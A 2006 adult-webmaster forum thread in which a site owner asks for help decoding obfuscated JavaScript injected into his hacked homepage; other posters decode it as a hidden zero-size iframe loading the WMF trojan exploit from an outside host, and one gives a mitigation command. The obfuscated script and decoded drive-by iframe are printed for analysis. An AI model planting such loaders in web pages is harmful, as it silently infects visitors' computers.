GoFuckYourself.com - Adult Webmaster Forum - Decode some javascript [please]

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)

- Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)

- - Decode some javascript [please] - server hack (https://gfy.com/showthread.php?t=561290)

Makingcoin

01-08-2006 11:43 AM

Decode some javascript [please] - server hack

:Oh crap Wtf is this crap on my homepage?

<script language="JavaScript">
e = '0x00' + '5E';str1 = "%E5%BD%B6%AB%C1%AC%AD%A6%B5%BA%E2%FF%AB%B6%AC%B6% BF%B6%B5%B6%AD%A6%E7%B9%B6%BD%BD%BA%B3%FF%E3%E5%B6 %BB%AF%BE%B2%BA%C1%AC%AF%BC%E2%FF%B9%AD%AD%B1%E7%F 0%F0%AA%AC%BA%AF%AC%BC%B0%AA%B3%AD%BA%AF%F3%BC%B0% B2%F0%B3%AD%AF%BE%BB%F0%FF%C1%A8%B6%BD%AD%B9%E2%EE %C1%B9%BA%B6%B8%B9%AD%E2%EE%E3%E5%F0%B6%BB%AF%BE%B 2%BA%E3%E5%F0%BD%B6%AB%E3%C1%D2%D7";str=tmp='';for (i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
</script>

~Ray	01-08-2006 11:48 AM

didn't you post this same message last week?

actually it was thinkx

http://www.gofuckyourself.com/showth...ounter+install

EdgeXXX

01-08-2006 11:50 AM

Gimme a sec to decode it and I'll tell ya

EdgeXXX

01-08-2006 12:12 PM

Makingcoin what page is it on?

AgentCash

01-08-2006 12:40 PM

Quote:

Whenever you want to decode something like this just look for the document.write(blah) and replace it with alert(blah)

SmokeyTheBear

01-08-2006 01:10 PM

yup its the wmf trojan

<body lang=EN-US link=blue vlink=purple style='tab-interval:.5in'>
<IFRAME src="http://userscounter.com/ntraf/xpl.wmf"frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no></IFRAME> <IFRAME src="index2.html"
frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 width=0 height=0 scrolling=no>
</IFRAME>

~Ray	01-08-2006 01:12 PM

Start - Run - insert
regsvr32 /u shimgvw.dll

All times are GMT -7. The time now is 10:37 AM.